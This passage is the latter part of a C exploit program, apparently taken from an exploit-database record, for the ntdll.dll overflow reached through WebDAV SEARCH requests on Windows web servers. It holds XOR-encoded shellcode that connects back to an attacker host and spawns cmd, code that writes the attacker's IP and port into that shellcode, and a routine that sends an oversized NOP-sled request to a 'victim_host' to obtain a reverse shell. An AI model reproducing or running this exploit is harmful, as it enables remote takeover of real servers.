7c\\xff\\xff\\xff\\x89\\x9d\"\r\n\"\\x78\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x33\\xc9\\x51\\x51\\x51\"\r\n\"\\x51\\x41\\x51\\x41\\x51\\xff\\xd0\\x89\\x85\\x94\\x00\\x00\\x00\\x8b\\x85\\x7c\"\r\n\"\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x83\\xc6\\x08\\x6a\\x10\\x56\"\r\n\"\\x8b\\x8d\\x94\\x00\\x00\\x00\\x51\\xff\\xd0\\x33\\xdb\\xc7\\x45\\x8c\\x44\\x00\"\r\n\"\\x00\\x00\\x89\\x5d\\x90\\x89\\x5d\\x94\\x89\\x5d\\x98\\x89\\x5d\\x9c\\x89\\x5d\"\r\n\"\\xa0\\x89\\x5d\\xa4\\x89\\x5d\\xa8\\xc7\\x45\\xb8\\x01\\x01\\x00\\x00\\x89\\x5d\"\r\n\"\\xbc\\x89\\x5d\\xc0\\x8b\\x9d\\x94\\x00\\x00\\x00\\x89\\x5d\\xc4\\x89\\x5d\\xc8\"\r\n\"\\x89\\x5d\\xcc\\x8d\\x45\\xd0\\x50\\x8d\\x4d\\x8c\\x51\\x6a\\x00\\x6a\\x00\\x6a\"\r\n\"\\x00\\x6a\\x01\\x6a\\x00\\x6a\\x00\\x83\\xc6\\x09\\x56\\x6a\\x00\\x8b\\x45\\x20\"\r\n\"\\xff\\xd0\"\r\n\"CreateProcessA\\x00LoadLibraryA\\x00ws2_32.dll\\x00WSASocketA\\x00\"\r\n\"connect\\x00\\x02\\x00\\x02\\x9A\\xC0\\xA8\\x01\\x01\\x00\"\r\n\"cmd\" // don't change anything..\r\n\"\\x00\\x00\\xe7\\x77\" // offsets of kernel32.dll for some win ver..\r\n\"\\x00\\x00\\xe8\\x77\"\r\n\"\\x00\\x00\\xf0\\x77\"\r\n\"\\x00\\x00\\xe4\\x77\"\r\n\"\\x00\\x88\\x3e\\x04\" // win2k3\r\n\"\\x00\\x00\\xf7\\xbf\" // win9x =P\r\n\"\\xff\\xff\\xff\\xff\";\r\n\r\nint test_host(char *host)\r\n{\r\nchar search[100]=\"\";\r\nint sock;\r\nstruct hostent *heh;\r\nstruct sockaddr_in hmm;\r\nchar buf[100] =\"\";\r\n\r\nif(strlen(host)>60) {\r\nprintf(\"error: victim host too long.\\r\\n\");\r\nreturn 1;\r\n}\r\n\r\nif ((heh = gethostbyname(host))==0){\r\nprintf(\"error: can't resolve '%s'\",host);\r\nreturn 1;\r\n}\r\n\r\nsprintf(search,\"SEARCH / HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n\",host);\r\nhmm.sin_port = htons(80);\r\nhmm.sin_family = AF_INET;\r\nhmm.sin_addr = *((struct in_addr *)heh->h_addr);\r\n\r\nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){\r\nprintf(\"error: can't create socket\");\r\nreturn 1;\r\n}\r\n\r\nprintf(\"Checking WebDav on '%s' ... 
\",host);\r\n\r\nif ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){\r\nprintf(\"CONNECTING_ERROR\\r\\n\");\r\nreturn 1;\r\n}\r\nsend(sock,search,strlen(search),0);\r\nrecv(sock,buf,sizeof(buf),0);\r\nif(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')\r\nreturn 0;\r\nprintf(\"NOT FOUND\\r\\n\");\r\nreturn 1;\r\n}\r\n\r\nvoid help(char *program)\r\n{\r\nprintf(\"syntax: %s <victim_host> <your_host> <your_port> [padding]\\r\\n\",program);\r\nreturn;\r\n}\r\n\r\nvoid banner(void)\r\n{\r\nprintf(\"\\r\\n\\t [Crpt] ntdll.dll exploit trough WebDAV by kralor\r\n[Crpt]\\r\\n\");\r\nprintf(\"\\t\\twww.coromputer.net && undernet #coromputer\\r\\n\\r\\n\");\r\nreturn;\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\nWSADATA wsaData;\r\nunsigned short port=0;\r\nchar *port_to_shell=\"\", *ip1=\"\", data[50]=\"\";\r\nunsigned int i,j;\r\nunsigned int ip = 0 ;\r\nint s, PAD=0x10;\r\nstruct hostent *he;\r\nstruct sockaddr_in crpt;\r\nchar buffer[65536] =\"\";\r\nchar request[80000]; // huuuh, what a mess! 
:)\r\nchar content[] =\r\n\"<?xml version=\\\"1.0\\\"?>\\r\\n\"\r\n\"<g:searchrequest xmlns:g=\\\"DAV:\\\">\\r\\n\"\r\n\"<g:sql>\\r\\n\"\r\n\"Select \\\"DAV:displayname\\\" from scope()\\r\\n\"\r\n\"</g:sql>\\r\\n\"\r\n\"</g:searchrequest>\\r\\n\";\r\n\r\nbanner();\r\nif((argc<4)||(argc>5)) {\r\nhelp(argv[0]);\r\nreturn;\r\n}\r\n\r\nif(WSAStartup(0x0101,&wsaData)!=0) {\r\nprintf(\"error starting winsock..\");\r\nreturn;\r\n}\r\n\r\nif(test_host(argv[1]))\r\nreturn;\r\n\r\nif(argc==5)\r\nPAD+=atoi(argv[4]);\r\n\r\nprintf(\"FOUND\\r\\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\\r\\n\",PAD,PAD);\r\n\r\nip = inet_addr(argv[2]); ip1 = (char*)&ip;\r\n\r\nshellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];\r\nshellc0de[451]=ip1[3];\r\n\r\nport = htons(atoi(argv[3]));\r\nport_to_shell = (char *) &port;\r\nshellc0de[446]=port_to_shell[0];\r\nshellc0de[447]=port_to_shell[1];\r\n\r\n// we xor the shellcode [xored by 0x95 to avoid bad chars]\r\n__asm {\r\nlea eax, shellc0de\r\nadd eax, 0x34\r\nxor ecx, ecx\r\nmov cx, 0x1b0\r\nwah:\r\nxor byte ptr[eax], 0x95\r\ninc eax\r\nloop wah\r\n}\r\n\r\nif ((he = gethostbyname(argv[1]))==0){\r\nprintf(\"error: can't resolve '%s'\",argv[1]);\r\nreturn;\r\n}\r\n\r\ncrpt.sin_port = htons(80);\r\ncrpt.sin_family = AF_INET;\r\ncrpt.sin_addr = *((struct in_addr *)he->h_addr);\r\n\r\nif ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){\r\nprintf(\"error: can't create socket\");\r\nreturn;\r\n}\r\n\r\nprintf(\"Connecting... \");\r\n\r\nif ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){\r\nprintf(\"ERROR\\r\\n\");\r\nreturn;\r\n}\r\n// No Operation.\r\nfor(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);\r\n// fill the buffer with the shellcode\r\nfor(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);\r\n// well..it is not necessary..\r\nfor(i=0;i<2500;buffer[i]=PAD,i++);\r\n\r\n/* we can simply put our ret in this 2 offsets.. 
*/\r\n//buffer[2086]=PAD;\r\n//buffer[2085]=PAD;\r\n\r\nbuffer[sizeof(buffer)]=0x00;\r\nmemset(request,0,sizeof(request));\r\nmemset(data,0,sizeof(data));\r\nsprintf(request,\"SEARCH /%s HTTP/1.1\\r\\nHost: %s\\r\\nContent-type: text/xml\\r\\nContent-Length: \",buffer,argv[1]);\r\nsprintf(request,\"%s%d\\r\\n\\r\\n\",request,strlen(content));\r\nprintf(\"CONNECTED\\r\\nSending evil request... \");\r\nsend(s,request,strlen(request),0);\r\nsend(s,content,strlen(content),0);\r\nprintf(\"SENT\\r\\n\");\r\nrecv(s,data,sizeof(data),0);\r\nif(data[0]!=0x00) {\r\nprintf(\"Server seems to be patched.\\r\\n\");\r\nprintf(\"data: %s\\r\\n\",data);\r\n} else\r\nprintf(\"Now if you are lucky you will get a shell.\\r\\n\");\r\nclosesocket(s);\r\nreturn;\r\n}\r\n\r \n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8289"}]}